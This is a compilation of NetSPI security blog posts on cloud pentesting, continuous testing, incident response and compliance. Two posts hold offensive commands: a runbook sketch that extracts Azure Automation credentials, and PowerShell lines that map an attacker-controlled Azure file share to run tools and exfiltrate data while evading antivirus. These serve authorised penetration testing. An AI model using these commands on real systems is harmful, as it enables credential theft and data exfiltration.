
Get-AzPasswords: Encrypting Automation Password Data

Get-AzPasswords is a function within the MicroBurst toolkit that’s used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials – Username/Password combinations
  • Connections – Service Principal accounts that you can assume the identity of
  • Certificates – Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). Retrieving any of the stored automation account credentials requires a runbook, and we really only have one easy option for returning the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.
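
To make that concrete, here is a minimal sketch of the kind of extraction runbook this describes, using the built-in Azure Automation cmdlets. The asset names are placeholders, and the actual Get-AzPasswords runbook is more involved.

# Minimal extraction runbook sketch (asset names are placeholders)
$cred = Get-AutomationPSCredential -Name 'ExampleCredential'   # Credential asset
$conn = Get-AutomationConnection -Name 'ExampleConnection'     # Connection asset
$cert = Get-AutomationCertificate -Name 'ExampleCertificate'   # Certificate asset

# Without any protection, this lands in the job output in cleartext
Write-Output ("{0} : {1}" -f $cred.UserName, $cred.GetNetworkCredential().Password)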

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

[Screenshot: automation account credentials displayed in cleartext in the runbook job output]

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don’t want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we’ve implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it’s written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it’s retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there’s less concern of someone decrypting the credential data from the logs after the fact.
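
As a simplified sketch of those steps (not the exact MicroBurst code; the certificate subject, file paths, and the $credentialData/$jobOutput variables are illustrative):

# Testing system: create a self-signed document-encryption cert and base64-encode the public cert (steps 1-3)
$cert = New-SelfSignedCertificate -Subject "CN=microburst" -CertStoreLocation "Cert:\CurrentUser\My" -KeyUsage KeyEncipherment,DataEncipherment -Type DocumentEncryptionCert
Export-Certificate -Cert $cert -FilePath .\microburst.cer | Out-Null
$certB64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes((Resolve-Path .\microburst.cer)))

# Runbook: decode the cert and use it to encrypt the credential data before it hits the job output (steps 4-5)
[IO.File]::WriteAllBytes("C:\Temp\microburst.cer", [Convert]::FromBase64String($certB64))
Protect-CmsMessage -To "C:\Temp\microburst.cer" -Content $credentialData | Write-Output

# Testing system: decrypt the retrieved job output, then remove the cert and the local file (steps 6-7)
$cleartext = Unprotect-CmsMessage -Content $jobOutput
Remove-Item .\microburst.cer
Remove-Item "Cert:\CurrentUser\My\$($cert.Thumbprint)"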

The Results

Those same credentials from above will now look like this in the output logs:

[Screenshot: the same credentials encrypted in the runbook job output]

On the Get-AzPasswords side of this, you won’t see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-AzPasswords in MicroBurst, make sure that you grab the latest version from NetSPI’s GitHub – https://github.com/NetSPI/MicroBurst


Four Must-Have Elements of an Always-On Cyber Security Program

Let’s face it. The chefs in our lives were right when preaching the “clean as you go” philosophy while cooking. Keeping counters and utensils washed and put back in place helps thwart the influx of bacteria and spread of cross contamination that could make us sick. Shouldn’t that same philosophy apply to cyber security, too? Forgoing a “clean as you go” program and conducting a penetration test just once each year may check a compliance box, but it ultimately proves unsuccessful when it comes to protecting your network and assets from the potential “bacteria” that can enter at any time.

Systems and applications in any organization become alarmingly vulnerable if monitored under a one-and-done scenario. An ongoing and continuous vulnerability management program or penetration testing program is an important guard against the potential threat to your technology assets that hackers pose nearly every second of the day. In fact, a University of Maryland study says that hackers attack every 39 seconds (on average 2,244 times a day). Think of how vulnerable your technology assets are in this environment if they are only penetration tested once a year.

As an aid to help put structure around a continuous penetration testing program, here are four core considerations that should be a key part of an always-on security program.

1. Prevent Breaches with an ‘Always On’ Testing Mentality

There’s no doubt about it: attack surfaces grow and evolve around the clock. With network configurations, new tools and applications, and third-party integrations coming online constantly, an atmosphere is created that opens the possibility of unidentified security gaps. This white paper points to the fact that cyber-attacks can affect your business and are almost as prevalent as natural disasters and extreme weather events. And we know from our own NetSPI research that nearly 70 percent of CISO security leaders are concerned about network vulnerabilities after implementing new security tools.

And those CISOs’ concerns are valid: take the recent announcement from the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA). CISA published security advice for organizations that may have rushed out Office 365 deployments to support remote working during the coronavirus pandemic. A ZDNet article says that CISA warns it continues to see organizations that have failed to implement security best practices for their Office 365 implementation. CISA is concerned that hurried deployments may have led to important security configuration oversights that could be exploited by attackers. With continuous penetration testing in place, security leaders can identify high risk vulnerabilities in real-time and close those security gaps faster.

2. Automation Is a Tool; Human Logic Is Critical

Good pentesters use automated scanning tools (ideally from many different sources) and run frequent vulnerability discovery and assessment scans as part of the overall pentesting process. Vulnerability scanning is generally considered a complement to the manual, deep-dive pentests conducted by an ethical hacker. Manual pentesting leverages the findings from automated vulnerability and risk assessment scanning tools to pick critical targets for experienced human pentesters to: 1) verify as high-fidelity findings rather than chasing false positives, and 2) consider exploiting as incremental steps toward eventually gaining privileged access somewhere important on the network.

Purely automated tools and highly automated testing activities cannot adequately test the business logic baked into an application. While some tools claim to perform complete testing, no automated technology solution on the market today can perform true business logic testing. The process requires the human element that goes well beyond the capabilities of even the most sophisticated automated tools.

3. Penetration Testing Reports Don’t Have to Be Mundane

We can all agree that there isn’t much enjoyment in reading pages and pages of pentesting data presented in static Excel or PDF documents. Now picture the paperwork for a once-a-year penetration testing report. Gulp! Much like many of us consume the daily news headlines, CISOs should view the daily “headlines” of their vulnerability management program through live pentest report results.

Under this scenario, less time is spent analyzing penetration testing report data, freeing valuable time for the important work of remediation. Insist on the following pentest report deliverables in your penetration testing program:

  1. Actionable, consumable discovery results to automatically correlate and normalize all of the data collected from multiple open source and proprietary tools.
  2. High quality documentation and reports related to all work delivered, including step-by-step screen-capture details and tester commentary for every successful manual attack.

4. Stay Ahead of the Attacks Through Remediation

To stay ahead of attacks that come every 39 seconds, it’s important to enable fast and continuous remediation efforts to keep threat actors at bay. This goes hand in hand with testing, analyzing, and reporting: if you’re not continuously testing for vulnerabilities, it’s highly probable that the issues remain unresolved. Layer these remediation best practices into your pentesting program:

  1. Industry standard and expert specific mitigation recommendations for all identified vulnerabilities.
  2. Traceability and archiving of all of the work done to make each subsequent round of testing for your organization more efficient and effective.

Factoring these considerations—always-on testing, manual testing, real-time reporting, and remediation—into the planning and design of penetration testing programs will significantly minimize the risk of damage or disruption that could occur in an organization, and dramatically boost the security of your cyber assets.


NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review

The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.

Minneapolis, Minnesota  – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle process, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which time the cost of remediation could increase exponentially.

“With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.”

NetSPI’s SAST and SCR services are offered in various engagement structures giving application and software development teams options to leverage the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services are also a solution to adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:

  • Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
  • Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
  • Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling as well as authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.

Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for up to a class size of 20, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques.

“We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.”

Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
tori@maccabee.com
612-294-3100


Cloud Security: What is it Really, Driving Forces Behind the Transition, and How to Get Started

In a recent episode of Agent of Influence, I talked with Mike Rothman, President of DisruptOps. Mike is a 25-year security veteran, specializing in the sexy aspects of security, such as protecting networks, protecting endpoints, security management, compliance, and helping clients navigate a secure evolution in their path to full cloud adoption. In addition to his role at DisruptOps, Mike is Analyst & President of Securosis. I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music, or wherever you listen to podcasts.

The Evolving Perception of the Cyber Security Industry

Mike shared the evolution of the cyber security industry from his mom’s perspective – twenty years ago, his mom had no idea what he did – “something with computers.” Today, though, as cyber security and data breaches have made headline news, he can point to that as being what he does – helping companies prevent similar breaches.

Cyber security has become much more visible and has entered the common vernacular. A lot of people used to complain that nobody takes the industry seriously, nobody cares about what we’re doing, and they marginalize everything that we’re talking about. But that has really flipped, because now nobody’s marginalizing anything about security. We have to show up in front of the board and talk about why we’re not keeping pace with the attackers and why we’re not protecting customer data to the degree that we need to. Security has become extremely visible in recent years.

To show this evolution of the industry, Mike noted he’s been to 23 of the last 24 RSA Conferences, but when he first started going to the show, it was in a hotel on top of Nob Hill in San Francisco, and there were about 500 people in attendance, most of whom were very technical. Now the conference has become a huge staple of the industry with 35,000-40,000 people attending each year. (Read our key takeaways from this year’s RSA Conference.)

As many guests on the Agent of Influence podcast have noted, the security industry is always evolving; there’s always a new challenge or a new type of methodology that’s being adopted. However, at the same time, there are also a lot of parallels in things that don’t change. For example, a lot of the new vulnerabilities being identified today are ultimately still the same types of vulnerabilities we’ve been finding for the longest time – there are still injection attacks; they just might be a different type of injection attack. I personally enjoy looking at things that are recurring and the same, but just look and feel different in the security space, which makes it interesting.

What Does Cloud Security Really Mean?

Mike started to specialize in cloud security because, as he says, he just got lucky. A friend of his, Jim Reavis, founded the Cloud Security Alliance and wanted to offer a certification in cloud security, but he had no way to train people so they could obtain the certification. Jim approached Mike and Rich Mogull to see if they could build the training curriculum for him. As Mike and Rich considered this offer, they realized they A) knew nothing about cloud and B) knew nothing about training!

That was 10 years ago, and as they say… the rest is history. Mike and Rich have been teaching cloud security for the past 10 years, including at the Black Hat Conference for the past five years and advising large customers about how to move their traditional data center operations into the cloud while protecting customer data and taking advantage of a number of the unique characteristics of the cloud. They’ve also founded a company called DisruptOps, which originated from research Mike did with Securosis that they spun out into a separate company to do cloud security automation and cloud security operations.

As Mike says, 10 years ago, nobody really knew what the cloud was, but over time, people started to realize that with the cloud, you get a lot more agility and a lot more flexibility in terms of how you can provision, and both scale up and contract your infrastructure, giving you the ability to do things that you could never do in your own data center. But as with most things that have tremendous upside, there’s also a downside. When you start to program your infrastructure, you end up having a lot of application code that’s representative of your infrastructure, and as we all know – defects happen.

One of the core essential characteristics of the cloud is broad network access, which means you need to be able to access these resources from wherever you are. But, if you screw up an access control policy, everybody can get to your resources, and that’s how a lot of cloud breaches happen today – somebody screws up an access control policy to a storage bucket that is somewhere within a cloud provider.

Data Security and the Cloud

DisruptOps’ aim is to get cyber security leaders and organizations to think about how they can start using architecture as the security control as we move forward. By that he means you can build an application stack that totally isolates your data layer from your compute layer from your presentation layer.

These are things you can’t do in your data center because of lateral movement. Once you compromise one thing in the data center, in a lot of cases, you’ve compromised everything in the data center. However, in the cloud, if you do the right thing from an isolation standpoint and an account boundary standpoint, you don’t have those same issues.

Mike encourages people to think more expansively about what things like a programmable infrastructure, isolation by definition, and default deny on all of your access policies for things that you put into the cloud would allow you to do. A lot of these constructs are kind of foreign to people who grew up in data center land. You really must think differently if you want to set things up optimally for the cloud, as opposed to just retrofitting what you’ve been doing for many years to fit the cloud.

Driving Forces Behind Moving from Traditional Data Centers to the Cloud

  1. Speed – Back in the day, it would take three to four weeks to get a new server ordered, shipped, set up in the rack, installed with an operating system, etc. Today, if you have your AWS free tier application, you can have a new server using almost any operating system in one minute. So, in one minute, you have unbounded compute, unbounded storage, and could set up a Class B IP network with one API call. This is just not possible in the data center. So there’s obviously a huge speed aspect of being able to do things and provision new things in the cloud quickly.
  2. Cost – Depending on how you do it, you can actually save a lot of money because you’re not using the resources that you had to build out in order to satisfy your peak usage; you can just expand your infrastructure as you need to and contract it when you’re not using those resources. If you’re able to auto scale and scale up and scale down and you build things using microservices and a lot of platform services that you don’t have to build and run all the time in your environment, you can really build a much more cost effective environment in order to run a lot of your technology operations.
    However, Mike said, if you do it wrong, which means taking stuff you already paid for and depreciated in your data center and moving it into the cloud, that becomes a fiasco. If you’re not ready to move to the cloud, you end up paying by the minute for resources that you’ve already paid for and depreciated.
  3. Agility – If you have an attack in one of your technology stacks, you just move it out, quarantine it, build a new one, and move your sessions over there. Unless you want to have totally replicable data centers, you can’t do this in a data center.

There are a lot of reasons to take advantage of the capabilities of the cloud: architecture, agility, cost, global capabilities, the elasticity to scale up and down, and more.

Resources to Get Started in the Cloud

Mike recommended the below resources and tools for people looking to learn more about the cloud:

  1. Read The Phoenix Project by Gene Kim, which Mike considers the manifesto of DevOps. Regardless of whether your organization is in the cloud or moving to the cloud, we’re undergoing a cultural transformation on the part of IT that looks a lot like DevOps. Some organizations will embrace the cloud in some ways, and other organizations will embrace it in others. The Phoenix Project will give you an idea in the form of a parable about what is possible. For example, what is a broken environment and how can you embrace some of these concepts and fix your environment? This gives you context for where things are going and what the optimal state looks like over time.
  2. Go to aws.amazon.com and sign up for an account in their free tier for a year and start playing around with it by setting up servers and networks, peering between things, sending data, accessing things via the API, logging into the console, and doing things like setting up identity access management policies on those resources. Playing around like this will allow you to get a feel for the granularity of what you can do in the cloud and how it’s different from how you manage your on-prem resources. Without having a basic understanding of how the most fundamental things work in the cloud, moving to the cloud will be really challenging. It is hard to understand how you need to change your security practice to embrace the cloud when you don’t know what the cloud is.
  3. Mike also plugged their basic cloud training courses, which provide both hands-on experience and the background needed to pass the Certificate of Cloud Security Knowledge certification. You’ll be able to both talk the language of the cloud and play around with it.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.


Azure File Shares for Pentesters

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a “net use z: \\testingbox\tools” from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence… I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”), and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mentioned on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.net\payloads may be a bad choice.
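
If you would rather script the setup than click through the portal, something along these lines with the Az PowerShell module should work (the resource group, storage account, and share names here are just examples):

# Create a storage account and a file share for testing (names are examples)
New-AzResourceGroup -Name "internal-tools" -Location "East US"
New-AzStorageAccount -ResourceGroupName "internal-tools" -Name "corpfileservices" -Location "East US" -SkuName Standard_LRS
New-AzRmStorageShare -ResourceGroupName "internal-tools" -StorageAccountName "corpfileservices" -Name "tools" -QuotaGiB 100

# Grab a key to use when mapping the share
(Get-AzStorageAccountKey -ResourceGroupName "internal-tools" -Name "corpfileservices")[0].Value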

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things and remove the connectTestResult commands from the code above:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I’ve found that the connection test code will frequently fail, even if you can map the drive. So there’s not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for cleanup, we will want to remove the added drive when we are done and remove any cmdkey entries from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.
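
If you prefer to script the rotation, the Az module can regenerate keys as well (again, the names are examples):

# Regenerate key1 so the old key can no longer be used to map the share
New-AzStorageAccountKey -ResourceGroupName "internal-tools" -Name "corpfileservices" -KeyName key1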

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.
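
As a rough sketch of that workflow using the AWS Tools for PowerShell (the instance ID and script file name are placeholders), pushing the combined script to a managed instance could look like this:

# Run the map/execute/cleanup script on a managed EC2 instance via SSM Run Command
Send-SSMCommand -InstanceId "i-0123456789abcdef0" -DocumentName "AWS-RunPowerShellScript" -Parameter @{commands = Get-Content .\map-run-cleanup.ps1}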

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don’t be surprised if you can use Azure file shares from an internal network.


Focus on Context to Improve Your Incident Response Plan

$8.19 million. That’s the average loss U.S. organizations face each year due to the damages of cyber security attacks, according to a Ponemon Institute study. More worrisome is the fact that the average time it took to identify and contain a breach was 279 days, a number that is growing. Cyber security and IT teams continue to feel unprepared in the event of a breach and struggle to keep pace with the ever-evolving threat landscape. Maintaining an always-on mentality, prioritizing vulnerability testing to enable faster remediation, and understanding the implications of an alert in an organization’s asset management platform are key to staying ahead. But in the long term, having a deep contextual knowledge of business operations as a whole should also be considered fundamental to preparing for and defending against escalating threats.

In 1988, Robert Morris created what has been widely acknowledged as the first major computer worm, which spread so aggressively and quickly that it succeeded in closing down much of the early internet. While the Morris Worm was the impetus for putting in place coordinated systems and incident teams to deal with cyberattacks, it wasn’t until the Target breach in 2013, in which information from 40 million credit and debit cards was stolen, that leaders in corporations began to fully understand that all levels of an organization must understand the potential threat of breaches and that ad hoc support of cyber security initiatives was no longer sufficient. Rather, all-encompassing programs of prevention, monitoring, and remediation must be in place.

Bringing Context to Incident Response

Incident response teams today must have full knowledge of the ecosystem and what systems need protecting (and the data residing within) to have a more comprehensive approach to protecting their organizations from cyber security threats. They can do so by adding context to incident response. Currently, if there is a threat event that occurs, the analyst has to synthesize the environment that they’re trying to defend before action can take place. But if they don’t have the contextual knowledge of their organization—what application supports what infrastructure, which impacts what business process and value stream—then that incident responder is already behind.

Security teams should understand what they are reacting to, know how to recreate the view, and immediately understand the ecosystem they are trying to protect so they can act on it right away rather than reverse engineer the situation, which may be too late to do anyway. In that case, the threat actor may be able to move faster than the incident responder. Easily said, but as apps are decomposed, the ecosystem is becoming even more distributed, making the context even harder for incident response managers to understand. With more and more applications and application security offered in containers, in the cloud (or cloud native), or serverless through functions-as-a-service platforms, incident responders are now in a position in which they need to understand the contextual challenge of the threats. It is critical that incident responders understand what type of threat they are responding to and what it is they are trying to protect in the larger business sense. Helping to create context is going to be an emerging challenge that needs to be addressed by the industry and community in the future.

Creating Better Asset Management Platforms to Improve Incident Response

When creating asset management platforms, I recommend that CISOs work with their team to base that development on context around the business and the technology. When the platform isn’t so rigidly defined in the context of an application, we start to make connections from the infrastructure to the business processes and the value streams. And it is then that you can truly start to be a counselor to senior leadership and articulate the business impact of any given threat. Through contextualization, you’ll immediately know when you have the asset data and the association, and whether it is of lesser importance (and you don’t need to wake up the CEO!). Or, vice versa, when there is a high-fidelity threat hitting the flagship application that sits behind the capabilities of the entire business process. That is when it will warrant executive leadership attention, but now you will be in a position to also provide solutions for remediation.

Some areas I’ve explored while developing asset management platforms revolve around visualization. I’m looking at the integration between logging and monitoring capabilities and the data they generate through asset management tools, but also other solutions like cloud and container monitoring platforms and the telemetry they provide. Then I’m looking at the visualization tools that are out there that can create these views. Picture this asset management platform chronology:

  1. Data comes up through logging and monitoring capability
  2. Incident Responder quickly determines it is a problem
  3. Through the functionality of the asset management platform, the backend stitches together all that data and pulls up a visualization tool that maps the internal and/or cloud environment, showing the team that this alert is associated with a particular container, which is part of a particular ecosystem/value stream that is talking to these specific databases
  4. Incident Responders quickly react to visual cues, improved through real-time contextual awareness, so they can more quickly appreciate the danger and immediately take real action to thwart the threat

That is a future state that positions incident responders as a force to be reckoned with against the ever-evolving threat landscape.

Improving Your Standing in Incident Response

In addition to investing in understanding the context of your incident response plans, I offer the following advice to improve incident responders’ professional standing:

  • Become Invaluable as Subject Matter Experts—Understand the ecosystem of your organization, the context in which threats may occur and the consequences on the business values streams so you can quickly synthesize the information to give the broader team – even the C-Suite – insights and counsel.
  • Always Remain Curious, Even Suspicious—Have your radar always on so that, for example, if a new threat comes out, which may or may not even impact your environment but may be within your vertical market, you can preemptively guard against them.
  • Understand the Threat and its Potential Impact—Be readily able to ascertain if there is a concern in your environment through volume metrics (i.e., how much of that problem do we have?) and through risk quantification (i.e., threat W is against X so not a concern, but threat Y is against Z so it is a big concern).

Conclusion

There is real opportunity to improve real-time contextual awareness so incident responders can more quickly appreciate what they have and act on it immediately rather than waste time making inferences about the environment. To be sure, incident response plans are ever evolving, and some plans are undoubtedly better than others. It boils down to whether the incident responders are executing on the plan and have an appropriate contextual appreciation of the environment, the ecosystem, the business value streams, and the stakeholders involved to get the right people to the table to best defend against adversaries.


Dark Reading: Pen Testing ROI: How to Communicate the Value of Security Testing

On July 9, 2020, NetSPI Managing Director Nabil Hannan was featured in Dark Reading.

Google “pen testing return on investment (ROI)” and you will find a lot of repetitive advice on how to best communicate the value of a pen-testing engagement. Evaluate the costs of noncompliance penalties, measure the impact of a breach against the cost of a pentest engagement, reduce time to remediation, to name a few. While all of these measurements are important, pen testing provides value beyond compliance and breach prevention, even through a financial lens. Let’s explore the critical steps to successfully define and communicate ROI for security testing.

Read the full article here.


Building a Security Framework in a Compliance-Driven World

Depending on the industry an organization is in, there are a multitude of specific, acronym-heavy rules, regulations, and frameworks which must be adhered to, especially for industries with extremely sensitive and valuable data, including healthcare, banking, and energy. For many years, these compliance-first frameworks – HIPAA for healthcare, PCI DSS for credit card handling, and NERC CIP for energy companies, to name a few – were the structure around which IT leaders managed their security programs. To further complicate things, there are multiple compliance-based frameworks that overlap and even others that are specific to the states in which an organization does business, like CCPA. A common example of cyber security compliance? Once a year (typically) organizations are required to have an outside third party evaluate their programs. Voilà! An organization is secure, right? Not always.

In my opinion, building your security program around a framework for compliance ensures an organization is compliant, but it doesn’t necessarily make it secure. In fact, if you’re simply implementing a security strategy to check a box, it’s likely that your systems are vulnerable to cyber adversaries. While security is foundational in these compliance-based frameworks, historically it was deemphasized for a period of time. But things are changing – specifically, the way we think about security is shifting away from a compliance-first mindset. Big data breaches got the attention of Boards of Directors from a financial (read: fines, lawsuits) and reputational loss standpoint. From a technology standpoint, there’s no longer an inside and outside of the organization, and just defending perimeters with firewalls is no longer adequate. And, one more example, with the move away from waterfall releases of applications to a more agile development philosophy, it makes business sense to elevate the frequency of vulnerability assessments, even moving to continuous, ongoing monitoring of internet-facing attack surfaces to more adequately protect against unauthorized access to an organization’s intellectual property.

Organizations that have a more mature technology footprint are surely interested in doing everything they possibly can to find and fix vulnerabilities. And even in a mature scenario, there’s ample opportunity to put in an action-based framework that ties up to an organization’s controls and security framework. Consider this: the world’s leading research organization, Gartner, found that between 2014-2018 approximately 41 percent of clients had either not selected a framework or had developed their own ad hoc framework. It goes on to show that failure to select any framework and/or build one from scratch can lead to security programs that:

  • Have critical control gaps and therefore don’t address current and emerging threats in line with stakeholder expectations.
  • Place undue burden on technical and security teams.
  • Waste precious funding on security controls that don’t move the needle on the organization’s risk profile.

How can we begin to administer a security-based framework? Quite simply, just begin. It doesn’t have to be perfect from the get-go. Consider it a work in progress. After all, the threat actors, technology assets, and detective controls are constantly changing. Thus, you will need to constantly change and adapt your continuous, always-on security and vulnerability management program. Here are some best practices to help you begin implementing your security-based framework changeover.

  1. Evaluate the landscape: Determine whether there has been a security framework or controls catalog developed for your specific industry sector. The NIST Cybersecurity Framework is a good place to start. But what happens when there is no industry-specific or government-mandated security framework and control catalog? In this case, security capability maturity and team capacity and capability become the key inputs in selecting your security control framework and control catalog. (Source: Gartner)
  2. Engage with organizational leadership outside of technology: Develop a scrum planning team with legal, risk, and front-line business unit representatives to help identify discrete regulatory or legislative obligations that need consideration.
  3. Audit your internal and external environment: Identify the contextual factors that could influence your selection of security framework and control.
  4. Invest in your people: Admit to technology fatigue and that some significant investments aren’t optimized to meet set objectives or are redundant. Instead, invest in a people-first, pentesting team that can approach security from the eyes of an attacker.
  5. Develop a plan based on continuous improvement: Combine manual and automated pentesting to produce real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

Remember: Just because an organization’s cyber security program is compliant, doesn’t mean it is secure. If an organization approaches its security programs from a security-first mindset, most likely it will comply with the necessary compliance rules and regulations. I see compliance as a subset of security, not the other way around.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.
